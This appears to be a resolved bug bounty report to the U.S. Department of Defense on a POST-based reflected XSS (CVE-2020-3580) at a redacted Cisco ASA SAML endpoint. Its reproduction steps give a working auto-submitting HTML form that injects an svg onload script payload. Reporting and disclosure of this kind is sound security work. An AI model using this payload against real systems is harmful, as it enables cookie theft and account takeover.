XSS DUE TO CVE-2020-3580
Medium
U
U.S. Dept Of Defense
Submitted None
Actions:
Reported by
ghimire_veshraj
Vulnerability Details
Technical details and impact analysis
Hello Team,
During my research, I found the following host to be vulnerable to CVE 2020-3580 which is POST BASED XSS.
Vulnerable URL: https://████/+CSCOE+/saml/sp/acs?tgname=a
## Impact
Attackers can steal cookies and even takeover accounts and perform different malicious activities.
## System Host(s)
███
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
Save following code as xss.html and open in browser:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://███/+CSCOE+/saml/sp/acs?tgname=a" method="POST">
<input type="hidden" name="SAMLResponse" value=""><svg/onload=alert('XSS')>" />
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
## Suggested Mitigation/Remediation Actions
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected